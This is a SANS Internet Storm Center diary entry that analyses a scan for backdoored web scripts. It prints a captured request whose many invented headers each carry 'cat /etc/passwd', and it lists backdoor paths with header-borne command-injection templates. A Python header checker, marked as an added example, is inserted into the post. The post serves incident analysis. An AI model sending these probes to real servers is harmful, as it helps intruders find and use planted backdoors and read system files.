Strange Http request... - SANS Internet Storm Center
UPDATE:

We received a nice tip about this one from Koivunen Toni, of CERT-FI...
Solution:
---> Looks like it is a scan for backdoored pr0n websites...

Below is another sample:

http://aaaaaaaaa.com/autorank/control.php
Accept-H33p3r:<<unix-command>>
http://bbbbbbbbb.com/images/nav.php
Accept-H33p3r:<<unix-command>>
http://xxxxxxxxx.com/cgi-bin/archives/00000155_.cgi
Accept-Ip:<<unix-command>>
http://yyyyyyyyy.net/cgi-bin/system.pl
Xa=Xa;g=<<unix-command>>;exit
http://wwwwwwwww.com/cgi-bin/pennywize/penny.cgi
Accept-Ip:<<unix-command>>
http://zzzzzzzzz.com/cgi-bin/tgsw/de/teens/control.cgi
Xa=Xa;g=<<unix-command>>;exit
http://ttttttttt.com/abicons/apache/small/icon.php
Accept-H33p3r:<<unix-command>>

-----------------------------------------------------------
Today we got an interesting email reporting a strange HTTP request:

--------------------------------------------------------------------------------
POST /thumbs/index.php HTTP/1.1
Host: example.com
Connection: keep-alive
Content-Length: 0
Cookie: cat /etc/passwd
Referer: http://example.com/thumbs/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Pragma: no-cache
Cache-Control: no-cache
accept_language: cat /etc/passwd
accept_ip: cat /etc/passwd
ip: cat /etc/passwd
accept_whynot: cat /etc/passwd
accept_phpinfo: cat /etc/passwd
accept_redlight: cat /etc/passwd
accept_ASE: cat /etc/passwd
accept_X: cat /etc/passwd
USER_X87NEK: cat /etc/passwd
ACCEPT_HHT: cat /etc/passwd
Accept_MUZZ: cat /etc/passwd
Accept_MusicIsTheKey: cat /etc/passwd
Accept_encoding: cat /etc/passwd
Accept_MS: cat /etc/passwd
ACCEPT_SHREK: cat /etc/passwd
ACCEPT_s1yntr1o: cat /etc/passwd
ACCEPT_shockfx: cat /etc/passwd
ACCEPT_COOLHK: cat /etc/passwd
ACCEPT_l0ve: cat /etc/passwd
Morgoth: cat /etc/passwd
ACCEPT_ShAd0w: cat /etc/passwd
ACCEPT_bk4712: cat /etc/passwd
Accept_BBBS: cat /etc/passwd
ACCEPT_Resys: cat /etc/passwd
ACCEPT_XPW: cat /etc/passwd
BC: cat /etc/passwd
ZION: cat /etc/passwd
cmd: cat /etc/passwd
ACCEPT_netsploiter: cat /etc/passwd
ACCEPT_jayman: cat /etc/passwd
ACCEPT_Joschi: cat /etc/passwd
ACCEPT_MechW: cat /etc/passwd
ACCEPT_slickrick: cat /etc/passwd
ACCEPT_Banana: cat /etc/passwd
ACCEPT_H33p3r: cat /etc/passwd
ACCEPT_KaIzeR: cat /etc/passwd
ACCEPT_Joschi: cat /etc/passwd
Content-type: application/x-www-form-urlencoded
-----------------------------------------------------------------------

While this is a 'strange' HTTP request, we believe that nothing in the 'cat /etc/passwd' part would be executed on the web server side...
So our request is: have you ever seen this before?
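As an added example (not from the diary), a small Python check that parses a raw request like the one above and flags headers whose values read like shell command lines, plus a count of non-standard header names, since a request carrying dozens of made-up headers is scanner-shaped. The header allow-list and the regex are assumptions for the example.

```python
import re

# Constructed sample, modelled on the request quoted in the diary (abbreviated).
SAMPLE_REQUEST = (
    "POST /thumbs/index.php HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "Cookie: cat /etc/passwd\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "accept_ip: cat /etc/passwd\r\n"
    "ACCEPT_H33p3r: cat /etc/passwd\r\n"
    "cmd: cat /etc/passwd\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n\r\n"
)

# Header names a browser or proxy legitimately sends (lower-cased). This allow-list
# is an assumption for the example; extend it for your own environment.
KNOWN_HEADERS = {
    "host", "connection", "content-length", "content-type", "cookie", "referer",
    "user-agent", "pragma", "cache-control", "accept", "accept-language",
    "accept-encoding", "accept-charset",
}

# A value that reads like a shell command line: a command word followed by an absolute
# path, a backtick or $( substitution, or /etc/passwd|shadow. A plain ';' is not a
# trigger on its own, because User-Agent and Content-Type use it legitimately.
SHELL_LIKE = re.compile(
    r"(?i)(?:^|[;&|]\s*)[a-z_][\w.-]*\s+/[\w./-]+|`|\$\(|/etc/(?:passwd|shadow)\b"
)

def parse_headers(raw):
    """Return (request_line, [(name, value), ...]) from a raw HTTP request."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = head.splitlines()
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return lines[0], headers

def suspicious_headers(raw):
    """Return [(name, value, reason)] for headers carrying a command-like payload."""
    findings = []
    for name, value in parse_headers(raw)[1]:
        if SHELL_LIKE.search(value):
            reason = "shell-like value"
            if name.lower() not in KNOWN_HEADERS:
                reason += " in custom header"
            findings.append((name, value, reason))
    return findings

def custom_header_count(raw):
    """Number of header names outside the allow-list."""
    return sum(1 for n, _ in parse_headers(raw)[1] if n.lower() not in KNOWN_HEADERS)
```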
---------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)


Pedro